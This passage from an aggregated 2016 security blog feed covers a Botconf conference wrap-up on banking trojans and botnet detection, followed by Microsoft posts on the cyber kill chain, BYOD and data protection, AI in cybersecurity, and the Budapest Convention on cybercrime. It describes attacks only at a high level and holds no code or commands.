  • /0GLMF (application/3dr)
  • /1GLMF (application/octet-stream)

Those can be easily detected via a simple regular expression. Vladimir & Fyodor reviewed the different waves of attacks and how they infected victims from 2012 to 2014. A specific mention for the “ADDPERIOD” abuse which is a flag set to a domain during registration. When the owner would like to cancel the DNS, the price can be refunded. Web sites are infected via memcache cache poisoning or an extra module added to the Apache web server.How to infect websites? Note that, in 2012, No antivirus on VT was able to flag LURK samples as malicious (score: 0). The talk ended with a video recorded by the Russian police when the LURK owners were arrested.

Then Andrey Kovalev and Evgeny Sidorov presented “Browser-based Malware: Evolution and Prevention”. This is not a new type of attack. MitB (“Man in the Browser“) is an attack where hooked interaction changes the information on the rendered page like adding some Javascript code). Targets are banking sites, mail providers or social networks. In 2013, there was already a talk proposed by Thomas Siebert from GData about this topic). There are many drawbacks with this kind of attack:

  • Browser upgrades may break the hook
  • App containers make the injection more difficult
  • A web injector process has to be in the target system
  • They are evidences (IOC’s)
  • AV software are getting better to detect them.

So, can we speak about MitB-NG or MitB 2.0? They are performed via malware or adware browser extensions, WFP or remote proxies. Don’t forget VPN end-point or Tor exit-nodes that can inject code! The next part of the talk was dedicated to the Eko backdoor and SmartBrowse. So, what about dDetection and prevention? CSP (“Content Security Policy“) usually used to make XSS harder can be useful. JavaScript validation can be implemented in code. The JS checks the page integrity (like file hashes). Conclusions: there are new challenges ahead and the extension stores should implement more checks. Finally, browser developers should pay more attention to mechanisms to protect users from rogue extensions (with signatures), AV should give more focus on extension and not only droppers.

The next talk was titled “Language Agnostic Botnet Detection Based on ESOM and DNS” and is the result of the research performed by a team: Urs Enliser, Christian Dietz, Gabi Drei and Rocco Mäandrisch. The talk started with the motivations to perform such research. Most malware uses DGA or “Domain Generation Algorithm”. If this algorithm can be reversed (sometimes it is), we are able to generate the list of all domains and build useful lists of IOC’s. The approach presented here was different. Why not use ESOM (“Emergent Self-Organising Maps“) to try to detect malicious domains amongst all the DNS traffic? The analysis was based on the following steps:

  • Extract language features from domain names in data samples
  • Run ESOM training
  • Categorise domain names from real live traffic with ESOM map

Here is an example of ESOM output:

SOM Example

The magic behing ESOM was explained but, for newbies like me, it was difficult to follow. I’d like to get a deeper introduction about this topic. The research is still ongoing but it looks promising.

The afternoon coffee break was welcome before the last set of presentations.  Victor Acin and  Raashid Bhat came on stage to present “Vawtrak Banking Trojan : A Threat to the Banking Ecosystem”. Vawtrak is in the wild for a while. It is performing MitB (see above) and is very modular & decentralised. Know before as Neverquest. The malware internals were reviewed (LZMAT compression, 32 & 64 bits versions, XOR encoding, etc) as well as the configuration containing C&C servers, botnet configuration, version, sign keys). By default, it injects itself into explorer.exe and iexplore.exe then in the child processes. After a review of the infection processes and all techniques used, the speakers reviewed the communications with the C&C. Vawtrak is a modular trojan. Multiple plugins provide opcode / API interface. Some statistics were disclosed and look very impressive:

  • Used by 2 groups
  • 85k botnet infections
  • Top-5: US, Canada, UK, India, France
  • 2.5M credentials exfiltrated
  • 82% of infection are in USA
  • 4000 identified IOC’s
  • Win7 is the most affected OS
  • 2058 infections on windows server 2008

Then, Wayne Crowder presented “Snoring Is Optional: The Metrics and Economics of Cyber Insurance for Malware Related Claims”. Not a technical talk at all but very interesting! Wayne’s exercise was to try to talk about botnets not from a technical point of view but from a cyber-insurance point of view. An interesting statistics reported by Wayne:If

If cybercrime had been a US company in 2014 it would have been the 2nd largest…

From an insurance perspective, more  malware samples mean more risks of data leak and more costs for the company. Insurance drives safety & security in many domains and it will follow this trend in cyber security for sure. What’s covered? Data theft (PII, cards, health data,), malwares, DDOS, hacking, business interruption, phishing, extortions, mistakes. What must cover a good policy?

  • Legal damages
  • Crisis
  • PCI (or similar) fines
  • Availability
  • Extortion
  • “cyber related perils” (who said “IoT”?)

Cyber Risks

The talk was clearly based on the US market and Wayne gave a lot of statistics. But, keep in mind that this could change in the EU zone with the new notification law coming in 2018 (GDPR) . Wayne also reviewed several cases where cyber insurance was involved (with nice names like Sony, Target, hospital ransomware, …). Not that not everything is covered (brand, reputation, state sponsored hacking). Very interesting and I’m curious to see how the cyber-insurance market will evolve in the (near) future.

The last talk was “Hunting Droids from the Inside” by Lukas Siewierski, also from Google. This was given again under TLP:RED.

That’s all for the first day and stay tuned for a new wrap-up. Don’t forget that some talks are streaming live via Youtube.

[The post Botconf 2016 Wrap-Up Day #1 has been first published on /dev/random]

from Xavier

Tuesday, November 29, 2016

Disrupting the kill chain

This post is authored by Jonathan Trull, Worldwide Executive Cybersecurity Advisor, Enterprise Cybersecurity Group.

The cyber kill chain describes the typical workflow, including techniques, tactics, and procedures or TTPs, used by attackers to infiltrate an organization’s networks and systems.  The Microsoft Global Incident Response and Recovery (GIRR) Team and Enterprise Threat Detection Service, Microsoft’s managed cyber threat detection service, identify and respond to thousands of targeted attacks per year.  Based on our experience, the image below illustrates how most targeted cyber intrusions occur today.


The initial attack typically includes the following steps:

  • External recon –  During this stage, the attacker typically searches publicly available sources to identify as much information as possible about their target.  This will include information about the target’s IP address range, business operations and supply chain, employees, executives, and technology utilized.  The goal of this stage is to develop sufficient intelligence to increase the chances of a successful attack. If the attacker has previously penetrated your environment, they may also refer to intelligence gathered during previous incursions.
  • Compromised machine – Attackers continue to use socially engineered attacks to gain an initial foothold on their victim’s network.  Why?  Because these attacks, especially if targeted and based on good intelligence, have an extremely high rate of success.  At this stage, the attacker will send a targeted phishing email to a carefully selected employee within the organization.  The email will either contain a malicious attachment or a link directing the recipient to a watering hole.  Once the user executes the attachment or visits the watering hole, another malicious tool known as a backdoor will be installed on the victim’s computer giving the attacker remote control of the computer.
  • Internal Recon and Lateral Movement – Now that the attacker has a foothold within the organization’s network, he or she will begin gathering information not previously available externally.  This will include performing host discovery scans, mapping internal networks and systems, and attempting to mount network shares.  The attacker will also begin using freely available, yet extremely effective tools, like Mimikatz and WCE to harvest credentials stored locally on the initially compromised machine and begin planning the next stage of the attack as shown below.


  • Domain Dominance – At this stage, the attacker will attempt to elevate their level of access to a higher trusted status within the network.  The attacker’s ultimate goal is to access your data and the privileged credentials of a domain administrator offers them many ways to access to your valuable data stores.  Once this occurs, the attacker will begin to pivot throughout the network either looking for valuable data or installing ransomware for future extortion attempts or both.
  • Data Consolidation and Exfiltration – Now that the attacker has access to the valuable data within the organization’s systems, he or she must consolidate it, package it up, and send it out of the network without being detected or blocked.  This is typically accomplished by encrypting the data and transferring it to an external system controlled by the attacker using approved network protocols like DNS, FTP, and SFTP or Internet-based file transfer solutions.

Microsoft Secure and Productive Enterprise

The Microsoft Secure and Productive Enterprise is a suite of product offerings that have been purposely built to disrupt this cyber attack kill chain while still ensuring an organization’s employees remain productive.  Below, I briefly describe how each of these technologies disrupts the kill chain:

  • Office 365 Advanced Threat ProtectionThis technology is designed to disrupt the “initial compromise” stage and raise the cost of successfully using phishing attacks.
    Most attackers leverage phishing emails containing malicious attachments or links pointing to watering hole sites. Advanced Threat Protection (ATP) in Office 365 provides protection against both known and unknown malware and viruses in email, provides real-time (time-of-click) protection against malicious URLs, as well as enhanced reporting and trace capabilities.  Messages and attachments are not only scanned against signatures powered by multiple antimalware engines and intelligence from Microsoft’s Intelligent Security Graph, but are also routed to a special detonation chamber, run, and the results analyzed with machine learning and advanced analysis techniques for signs of malicious behavior to detect and block threats. Enhanced reporting capabilities also make it possible for security teams to quickly identify and respond to email based attacks when they occur.
  • Windows 10 –  This technology disrupts the compromised machine and lateral movement stages by raising the difficulty of successfully compromising and retaining control of a user’s PC and by protecting the accounts and credentials stored and used on the device.
    If an attacker still manages to deliver malware through to one of the organization’s employees by some other mechanism (e.g., via personal email), Windows 10’s security features are designed to both stop the initial infection, and if infected, prevent further lateral movement. Specifically, Windows Defender Application Guard uses new, hardware based virtualization technology to wrap a protective border around the Edge browser.  Even if malware executes within the browser, it cannot access the underlying operating system and is cleaned from the machine once the browser is closed.  Windows Device Guard provides an extra layer of protection to ensure that only trusted programs are loaded and run preventing the execution of malicious programs, and Windows Credential Guard uses the same hardware based virtualization technology discussed earlier to prevent attackers who manage to gain an initial foothold from obtaining other credentials stored on the endpoint.  And finally, Windows Defender Advanced Threat Protection is the DVR for your company’s security team.  It provides a near real-time recording of everything occurring on your endpoints and uses built-in signatures, machine learning, deep file analysis through detonation as a service, and the power of the Microsoft Intelligent Security Graph to detect threats.  It also provides security teams with remote access to critical forensic data needed to investigate complex attacks.
  • Microsoft Advanced Threat AnalyticsThis technology disrupts the lateral movement phase by detecting lateral movement attack techniques early, allowing for rapid response.
    If an attacker still manages to get through the above defenses, compromise credentials, and moves laterally, the Microsoft Advanced Threat Analytics (ATA) solution provides a robust set of capabilities to detect this stage of an attack.  ATA uses both detection of known attack techniques as well as a user-based analytics that learns what is “normal” for your environment so it can spot anomalies that indicate an attack. Microsoft ATA can detect internal recon attempts such as DNS enumeration, use of compromised credentials like access attempts during abnormal times, lateral movement (Pass-the-Ticket, Pass-the-Hash, etc.), privilege escalation (forged PAC), and domain dominance activities (skeleton key malware, golden tickets, remote execution).
  • Azure Security Center – While Microsoft ATA detects cyber attacks occurring within an organization’s data centers, Azure Security Center extends this level of protection into the cloud.

And now for the best part.  As shown in the image below, each of the above listed technologies is designed to work seamlessly together and provide security teams with visibility across the entire kill chain.


Each of these technologies also leverage the power of the Microsoft Intelligent Security Graph, which includes cyber threat intelligence collected from Microsoft’s products and services, to provide the most comprehensive and accurate detections.

  • Cloud App Security, Intune, Azure Information Protection, and Windows 10 Information Protection – And finally, the Microsoft Secure and Productive Enterprise Suite provides significant capabilities to classify and protect data and prevent its loss.  Among other capabilities, Microsoft Cloud App Security can identify and control the use of unsanctioned cloud applications.  This helps organizations prevent data loss, whether from an attack or rogue employee, via cloud-based applications.  Intune and Windows 10 Information Protection prevent corporate data from being intermingled with personal data or used by unsanctioned applications whether on a Windows 10 device or on iOS or Android based mobile devices.  And finally, Azure Information Protection provides organizations and their employees with the ability to classify and protect data using digital rights management technology.  Organizations can now implement and enforce a need-to-know strategy thereby significantly reducing the amount of unencrypted data available should an attacker gain access to their network.

Finally, Microsoft’s Enterprise Cybersecurity Group (ECG) also offers a range of both proactive and reactive services that leverages the capabilities of the Secure and Productive Enterprise suite in combination with the Intelligent Security Graph to help companies detect, respond to, and recover from attacks.

In the coming weeks, I will be following up with blogs and demos that go deeper into each of the above listed technologies and discuss how companies can most effectively integrate these solutions into their security strategies, operations, and existing technologies.  To learn more about Microsoft technologies visit Microsoft Secure..

from Microsoft Secure Blog Staff

Friday, November 25, 2016

[SANS ISC Diary] Free Software Quick Security Checklist

I published the following diary on “Free Software Quick Security Checklist“.

Free software (open source or not) is interesting for many reasons. It can be adapted to your own needs, it can be easily integrated within complex architectures but the most important remains, of course, the price. Even if they are many hidden costs related to “free” software. In case of issues, a lot of time may be spent in searching for a solution or diving into the source code (and everybody knows that time is money!)… [Read more]


[The post [SANS ISC Diary] Free Software Quick Security Checklist has been first published on /dev/random]

from Xavier

Monday, November 21, 2016

The four necessities of modern IT security

As companies embrace the cloud and mobile computing to connect with their customers and optimize their operations, they take on new risks. Traditional IT boundaries have disappeared, and adversaries have many new attack vectors.

Even with a bevy of security tools already deployed, IT teams are having to process a lot of data and signal that makes it hard to find and prioritize relevant threats.  Solutions often compromise end-user productivity for the sake of security, leading to end-user dissatisfaction and, too often, rejection or misuse of the solution. And, without the ability to detect suspicious behavior, early signs of an attack can go unnoticed.

To confront these challenges, Microsoft is building a platform that looks holistically across all the critical endpoints of today’s cloud and mobile world. We are acting on the intelligence that comes from our security-related signals and insights. And we are fostering a vibrant ecosystem of partners who help us raise the bar across the industry.

Our platform investments span four categories: identity, apps and data, devices, and infrastructure. Here is what you can expect from our security platform and solutions in each of these critical areas:

Identity— Help protect against identity compromise and identify potential breaches before they cause damage
  • Mitigate identity compromise with multi-factor authentication
  • Go beyond passwords and move to more secure forms of authentication
  • Identify signs of breach early with behavioral analytics that help detect suspicious activity
  • Respond quickly by automatically elevating access requirements based on risks
Apps and Data—Boost productivity with cloud access while keeping information protected
  • Enable employees to use cloud apps without losing control of corporate data
  • Classify, contain, and encrypt data based on IT policy—even on user-owned devices
  • Get notification of attempts for unauthorized data access, manage access to documents, remotely wipe data when necessary
Devices—Enhance device security while enabling mobile work and BYOD
  • Encrypt data, manage devices, and ensure compliance
  • Automatically identify suspicious or compromised endpoints and respond to targeted attacks
  • Rapidly block, quarantine, or wipe compromised devices
Infrastructure—Take a new approach to security across your hybrid environment
  • Gain greater visibility and control across on-premises and cloud environments
  • Enforce security policies on cloud resources and detect any deviations from baselines
  • Identify signs of compromise early through behavioral analysis and respond more quickly
  • Separate security event noise from signals with advanced analysis and machine learning

To learn more about security best practices, download the free eBook, “Protect Your Data: 7 Ways to Improve Your Security Posture”

from Microsoft Secure Blog Staff

"European Security Awareness Summit - After Action Report"

I'm flying home after this year's European Security Awareness Summit and wanted to share my thoughts and experiences from the event while still fresh in my mind. Once a year, every year, we host a security awareness summit both in the United States and in Europe. The purpose of the awareness summits are to bring &hellip; Continue reading European Security Awareness Summit - After Action Report

from lspitzner

Thursday, November 17, 2016

The Budapest Convention on Cybercrime – 15th Anniversary

This post was authored by Gene Burrus, Assistant General Counsel

November 2016 marks the 15th anniversary of the Convention on Cybercrime of the Council of Europe, commonly referred to as the Budapest Convention.

The treaty is the preeminent binding international instrument in the area of cybercrime. It serves as a guideline for countries developing national legislation and provides a framework for international cooperation between countries’ law enforcement agencies, so critical to cybercrime investigation and prosecution.

Since its inception, 50 countries have recognized this reality by acceding to it, with an additional six signing it, and a further 12 having been invited to do so. Its influence extends far beyond those countries, with a number of international organizations participating in the Convention Committee and many other countries looking at it for best practices.

The Budapest Convention’s success lies in part in the fact that it has not held still. As technology evolved, the Convention’s members sought to adopt a set of recommendations to make mutual legal assistance requests more efficient, as well as begun to investigate how to ensure that its premises are still valid under the new paradigm of cloud computing.

The importance of this to Microsoft, and its customers, is large and increasing. Estimates of global financial losses from cybercrime exceed $400 billion a year. And that number understates the less tangible impacts on privacy, trust, innovation and adoption of new technologies. Thus, effectively fighting cybercrime is of critical importance to Microsoft’s business.

In addition, the process of detecting and investigating cybercrime often involves private technology providers like Microsoft and partnerships between Microsoft and law enforcement. Driving towards the objectives of the Budapest Convention – to drive a common harmonized set of criminal prohibitions, and to facilitate international cooperation – is directly beneficial to our customers. Greater harmonization among national approaches on criminalizing behavior, criminal procedure and investigative capabilities are critical to helping companies like Microsoft ensure compliance with what otherwise might be conflicting legal obligations under different legal regimes.

The Convention’s main objectives are two-fold: to drive a common harmonized set of criminal prohibitions, and to facilitate international cooperation. Setting prohibitions and facilitating cooperation is important for Microsoft when it is looking to help protect customers. The first step in fighting cybercrime often consists of ensuring that the country where a perpetrator might live actually has laws against cybercrimes. Absent this, a perpetrator can act with impunity in a so called safe haven. The Convention defines a number of different types of crimes that can be committed online, providing a common frame of reference for its members, including:

  • Hacking crimes involving unlawfully accessing, intercepting or interfering with computers and computer networks;
  • Computer related fraud crimes;
  • Content related crimes, such as child pornography.

Secondly, the Convention aims to provide for criminal procedure necessary to investigate and prosecute cybercrimes, and to set up a fast, efficient, effective regime for cooperation between law enforcement in different nations. The latter is critical for Microsoft to help protect its customers. By its very nature cybercrime is almost always international in its scope. Perpetrators sitting in one country often attack victims in other countries, frequently using servers and networks sitting in yet others. Therefore, there must be procedures and mechanisms in place to facilitate and enable cooperation between and among the countries where the victims, the perpetrators, and the computer systems are physically located.

Finally, and outside the scope or the powers of the Budapest Convention, the practical reality of motivating a country housing a perpetrator, but which may have few nationals as victims itself, to spend resources addressing that crime must be overcome. That will continue to be easier said than done, until all countries come to a realization that trust in the online environment is mutually beneficial and difficult to maintain. Lack of trust it will impact all online economies, no matter where the criminals come from.

On its 15th birthday the Budapest Convention has been established as the gold standard of international conventions in the area of cybercrime. It’s a critical tool in our efforts to help protect and secure our products and our customers against cybercriminals. We hope that in the coming years more countries join it in an effort to eradicate the most modern of crimes.

from Microsoft Secure Blog Staff

[SANS ISC Diary] Example of Getting Analysts & Researchers Away

I published the following diary on “Example of Getting Analysts & Researchers Away“.

It is well-known that bad guys implement pieces of code to defeat security analysts and researchers. Modern malware’s have VM evasion techniques to detect as soon as possible if they are executed in a sandbox environment. The same applies for web services like phishing pages or C&C control panels… [Read more]

[The post [SANS ISC Diary] Example of Getting Analysts & Researchers Away has been first published on /dev/random]

from Xavier

"The Three C's of Awareness"

Upgrade your Cyber Awareness Training with the Three C's of Security Awareness According to the 2016 Security Awareness Report, over 80% of security awareness professionals have a background in either information security or information technology. Less than 15% have a background in soft skills such as training, marketing or communications. This technical orientation has significant &hellip; Continue reading The Three C's of Awareness

from lspitzner

Monday, November 14, 2016

Securing the new BYOD frontline: Mobile apps and data

With personal smartphones, tablets, and laptops becoming ubiquitous in the workplace, bring your own device (BYOD) strategies and security measures have evolved. The frontlines have shifted from the devices themselves to the apps and data residing on—or accessed through—them.

Mobile devices and cloud-based apps have undeniably transformed the way businesses operate. But they also introduce new security and compliance risks that must be understood and mitigated. When personal and corporate apps are intermingled on the same device, how can organizations remain compliant and protected while giving employees the best productivity experience? And when corporate information is dispersed among disparate, often unmanaged locations, how can organizations make sure sensitive data is always secured?

Traditional perimeter solutions have proved to be inadequate in keeping up with the stream of new apps available to users. And newer point solutions either require multiple vendors or are just too complex and time-consuming for IT teams to implement. Companies need a comprehensive, integrated method for protecting information—regardless of where it is stored, how it is accessed, or with whom it is shared.

Microsoft’s end-to-end information protection solutions can help reconcile the disparity between user productivity and enterprise compliance and protection. Our identity and access management solutions integrate with existing infrastructure systems to protect access to applications and resources across corporate data centers and in the cloud.

The following Microsoft solutions and technologies provide access control on several levels, offering ample coverage that can be up and running with the simple click of a button:

Identity and access management

Simplify user access with identity-based single sign-on (SSO). Azure Active Directory Premium (Azure AD) syncs with existing on-premises directories to simplify access to any application—even those in the cloud—with a secured, unified identity. No more juggling multiple combinations of user names and passwords. Users sign in only once using an authenticated corporate ID, then receive a token enabling access to resources as long as the token is valid. Azure AD comes pre-integrated with thousands of popular SaaS apps and works seamlessly with iOS, Android, Windows, and PC devices to deliver multi-platform access. Not only does unified identity with SSO simplify user access, it can also reduce the overhead costs associated with operating and maintaining multiple user accounts

Secure and compliant mobile devices

Microsoft Intune manages and protects devices, corporate apps, and data on almost any personal or corporate-owned device. Through Intune mobile device management (MDM) capabilities, IT teams can create and define compliance policies to meet specific business requirements, deploy policies to users or devices, and monitor device and/or user compliance from a single administration console. Intune compliance policies deliver complete visibility into users’ device health, and enable IT to block or restrict access if the device becomes non-compliant. IT administrators also have the option to install device settings that perform remote actions, such as passcode reset, device lock, data encryption, or full wipe of a lost, stolen, or non-compliant device.

Conditional access

Microsoft Intune can also help reinforce access protection by verifying the health of users and devices prior to granting privileges with conditional access policies. Intune policies evaluate user and device health by assessing factors like IP range, the user’s group enrollment, and if the device is managed by Intune and compliant with policies set by administrators. During the policy verification process, Intune blocks the user’s access until the device is encrypted, a passcode is set, and the device is no longer jailbroken or rooted. Intune integrates with cloud services like Office 365 and Exchange to confirm device health and grant access based on health results.

Multi-factor authentication

Multi-factor authentication is a feature built into Azure Active Directory that provides an additional layer of authentication to help make sure only the right people have the right access to corporate applications. It prevents unauthorized access to on-premises and cloud apps with additional authentication required, and offers flexible enforcement based on user, device, or app to reduce compliance risks.

To learn more about BYOD security, download the free eBook, Protect Your Data: 7 Ways to Improve Your Security Posture


from Microsoft Secure Blog Staff

Artificial intelligence and cybersecurity: The future is here

Although we’re a very long way from putting artificial intelligence (AI) in charge of national defense, the use of AI in cybersecurity isn’t science fiction. The ability of machines to rapidly analyze and respond to the unprecedented quantities of data is becoming indispensable as cyberattacks’ frequency, scale and sophistication all continue to increase.

The research being done today shows that automated cybersecurity systems can do many things with only limited human oversight. Through neural networks, heuristics, data science, etc. systems are being designed to identify cyberattacks, to spot and remove malware, and to find ways to fix bugs faster than any human could. In some respects, this work is simply an extension of the principles that people have got used to in their mail-filters or firewalls. That being said, there is something qualitatively different about the AI’s “end game”, i.e. having cybersecurity decisions taken by technology without human intermediation.

This novelty brings with it entirely new challenges. For example, what would legal frameworks around such cybersecurity look like? How would we regulate their creation and their use? What would we in fact regulate? There has already been some insightful writing and research done on this (see Potential AI Regulatory Problems and Regulating AI systems for example), but for policy-makers the fundamental challenge of defining what an AI is and what it is not remains. Without such fundamentals, even outcomes oriented approaches could fall short as there is no certainty about when they must be used.

If our brains were simple enough for us to understand them, we’d be so simple that we couldn’t.” Ian Stewart, The Collapse of Chaos: Discovering Simplicity in a Complex World)

In fact, AI technologies will be complex. Many government policymakers may struggle to understand them and how to best oversee their integration and evolution in government, society and key economic sectors. This is further complicated by the chance that the creation of AI might be a globally distributed effort, operating across jurisdictions with potentially distinct approaches to regulation. Smart cars, digital assistants, and algorithmic trading on financial markets are already pushing us towards AI, how could we improve the understanding of the technology, transparency about its decision making, integrity of its development and ethics, and the actual control of the technology in practical terms?

But it is also critical to understand the role AI can and will play in cybersecurity and resilience. The technology is initially likely to be “white hat” enabling critical infrastructures to protect themselves and the essential services they provide to the economy, society and public safety in new and novel ways. AI may enable systems to anticipate and rapidly mitigate security incidents or advanced persistent threats. But, as we have seen in cybersecurity, we will likely see criminal organizations or nation states seek to exploit AI to evade cybersecurity defenses or even attack. This means that reaching consensus on cybersecurity norms becomes more important and urgent. The work on cybersecurity norms will need more public and private sector cooperation globally.

In conclusion, it is worth noting that despite the challenges posed by AI in cybersecurity, there are also interesting and positive implications for the balance between cybersecurity and cyber-resilience. If cybersecurity teams can rely on smart systems to play defense, their focus can turn to preparing to handle a successful attack’s consequences. The ability to reinvent processes, to adapt to “black swan” events and to respond to developments that violate the fundamental assumptions on which an AI is built, should remain distinctly human for some time to come.


from Paul Nicholas

Wednesday, November 9, 2016

Enabling collaboration—without data leaks

Many of us have accidentally sent sensitive information to the wrong person at some point in our career, perhaps without even knowing. This is a frightening reality for companies and their IT teams, especially as collaboration increases and corporate data becomes more distributed among on-premises and cloud environments. Monitoring every device, application, and piece of data at all times is not only not practical—it’s impossible.

To stay protected and compliant, IT groups need the ability to effectively manage users and devices in ways that enable productivity without introducing risk. And users must learn to protect themselves from situations in which leaks could occur.

To help mitigate data leaks, influence user best practices, and still allow for collaboration, Microsoft designed the following security features to protect corporate data—whether it is in the data center, in the cloud, or shared with internal and external partners:

Manage your mobile applications

With Microsoft Intune mobile application management (MAM), organizations can control apps and resources at the app level. IT can discourage users from working in unauthorized apps by applying restrictions that prevent copying, pasting, or saving data from a managed app onto an unmanaged app. End users can work productively in familiar Office apps and retain the rich Office productivity experience. Intune MAM capabilities are native to Office mobile apps, but can also be extended to other proprietary and line-of-business apps through the Intune SDK or Intune App Wrapping tool.

Lock mobile devices down

Device Guard is a combination of enterprise-related hardware and software security features that, when configured together, will lock a device down so it can only run trusted applications. When in the lockdown state, users will not have the ability to modify the device state, preventing further unauthorized mobile behavior. Device Guard automatically senses threatening behavior and takes appropriate action, unburdening IT from constantly supervising user behavior at all times.

Protect enterprise data

A combination of Windows 10, Intune, and Azure Rights Management, Windows Information Protection (WIP), previously known as Enterprise Data Protection (EDP), separates and protects enterprise apps and data against disclosure risks across both company and personal devices—without requiring changes in environments or apps. WIP integrates with Intune to enable comprehensive management of WIP policies to protect corporate data by preventing unauthorized apps from accessing business data, similar to the Intune MAM capabilities for iOS and Android. With this capability, all copy and paste functions are restricted for unknown sources and remote wipe of sensitive data can be performed on devices to prevent unauthorized mingling of personal and corporate data.

Prevent data loss

Data Loss Prevention (DLP) in Office 365 helps identify the areas that are most susceptible to threats and potential data loss. The DLP classification engine built into Office 365 analyzes data across programs like Exchange, SharePoint, OneDrive for Business, and Office applications to determine which information is the most sensitive and vulnerable based on unique business requirements. DLP Policy Tips provide complete visibility to help influence better-informed decision making. IT can then leverage this data to inform and enforce compliance and security policies that will best protect sensitive information.

Utilize policy-driven access control

Azure Rights Management (Azure RMS) enables IT to encrypt data at the file level and apply policy-based permissions based on the user’s identity. These access control policies provide integrated coverage across on-premises environments and cloud applications. IT can define privileges for users and files, ensuring only the right people can view sensitive information. Actions like viewing, editing, authoring, and co-authoring capabilities delegated to the user are all governed by access control policies, and they can be tailored to meet specific project or business needs. Designed to support multiple workloads such as Exchange, SharePoint, and Office documents, Azure RMS enables safer sharing and collaboration with partners inside and outside the organization.

To learn more about secure collaboration, download the free eBook, “Protect Your Data: 7 Ways to Improve Your Security Posture”.

from Microsoft Secure Blog Staff